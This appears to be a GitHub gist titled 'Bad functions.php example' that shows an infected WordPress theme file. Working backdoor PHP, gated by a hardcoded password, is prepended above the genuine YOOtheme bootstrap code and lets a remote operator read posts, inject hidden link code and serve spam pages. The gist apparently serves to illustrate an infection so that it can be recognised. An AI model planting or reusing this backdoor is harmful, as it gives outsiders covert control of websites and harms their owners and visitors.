Bad functions.php example
<?php | |
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '7aa4ec0ada577823232adaa56b233f8b')) | |
{ | |
switch ($_REQUEST['action']) | |
{ | |
case 'get_all_links'; | |
foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data) | |
{ | |
$data['code'] = ''; | |
if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_)) | |
{ | |
$data['code'] = $_[1]; | |
} | |
print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n"; | |
} | |
break; | |
case 'set_id_links'; | |
if (isset($_REQUEST['data'])) | |
{ | |
$data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"'); | |
$post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content); | |
if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>'; | |
if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false) | |
{ | |
print "true"; | |
} | |
} | |
break; | |
case 'create_page'; | |
if (isset($_REQUEST['remove_page'])) | |
{ | |
if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"')) | |
{ | |
print "true"; | |
} | |
} | |
elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content'])) | |
{ | |
if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"')) | |
{ | |
print "true"; | |
} | |
} | |
break; | |
default: print "ERROR_WP_ACTION WP_URL_CD"; | |
} | |
die(""); | |
} | |
if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' ) | |
{ | |
$data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"'); | |
if ($data -> full_content) | |
{ | |
print stripslashes($data -> content); | |
} | |
else | |
{ | |
print '<!DOCTYPE html>'; | |
print '<html '; | |
language_attributes(); | |
print ' class="no-js">'; | |
print '<head>'; | |
print '<title>'.stripslashes($data -> title).'</title>'; | |
print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />'; | |
print '<meta name="Description" content="'.stripslashes($data -> description).'" />'; | |
print '<meta name="robots" content="index, follow" />'; | |
print '<meta charset="'; | |
bloginfo( 'charset' ); | |
print '" />'; | |
print '<meta name="viewport" content="width=device-width">'; | |
print '<link rel="profile" href="http://gmpg.org/xfn/11">'; | |
print '<link rel="pingback" href="'; | |
bloginfo( 'pingback_url' ); | |
print '">'; | |
wp_head(); | |
print '</head>'; | |
print '<body>'; | |
print '<div id="content" class="site-content">'; | |
print stripslashes($data -> content); | |
get_search_form(); | |
get_sidebar(); | |
get_footer(); | |
} | |
exit; | |
} | |
?><?php | |
/** | |
* @package Peak | |
* @author YOOtheme http://www.yootheme.com | |
* @copyright Copyright (C) YOOtheme GmbH | |
* @license http://www.gnu.org/licenses/gpl.html GNU/GPL | |
*/ | |
// check compatibility | |
if (version_compare(PHP_VERSION, '5.3', '>=')) { | |
// bootstrap warp | |
require(__DIR__.'/warp.php'); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment